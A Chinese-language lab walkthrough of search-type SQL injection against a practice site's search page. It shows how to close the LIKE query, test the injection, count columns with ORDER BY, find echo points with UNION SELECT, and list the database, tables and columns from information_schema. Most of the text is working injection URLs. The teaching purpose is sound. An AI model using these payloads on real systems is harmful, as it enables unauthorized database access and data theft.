sql_lab之sqli中的搜索型注入

搜索型注入

原理是运用模糊查询:

select * from users where username like '%a%'

1.找到具有模糊查询的搜索框的注入点

sql_lab之sqli中的搜索型注入_第1张图片

2.构造闭合

因为模糊查询的代码是

select * from users where username like '%a%'

所以应该

鱼%’ -- s

判断构造闭合的函数是否正确

鱼%' and 1=1 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=1 -- s

sql_lab之sqli中的搜索型注入_第2张图片

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=2 -- s

sql_lab之sqli中的搜索型注入_第3张图片

证明闭合成功

3.查询字段数

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 10 -- s

sql_lab之sqli中的搜索型注入_第4张图片

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 5 -- s

sql_lab之sqli中的搜索型注入_第5张图片

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 7 -- s

sql_lab之sqli中的搜索型注入_第6张图片

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 8 -- s

sql_lab之sqli中的搜索型注入_第7张图片

所以说字段数为7

4.union联合查询,判断回显点

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,2,3,4,5,6,7 -- s

sql_lab之sqli中的搜索型注入_第8张图片

所以说回显点为2和6

5.查询数据库

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,6,7 -- s

sql_lab之sqli中的搜索型注入_第9张图片

6.查询表名

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(table_name) ,7 from information_schema.tables where table_schema="food_db" -- s

sql_lab之sqli中的搜索型注入_第10张图片

7.查询字段

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(column_name) ,7 from information_schema.columns where table_schema="food_db" and table_name="collection" -- s

sql_lab之sqli中的搜索型注入_第11张图片

你可能感兴趣的:(sql,数据库)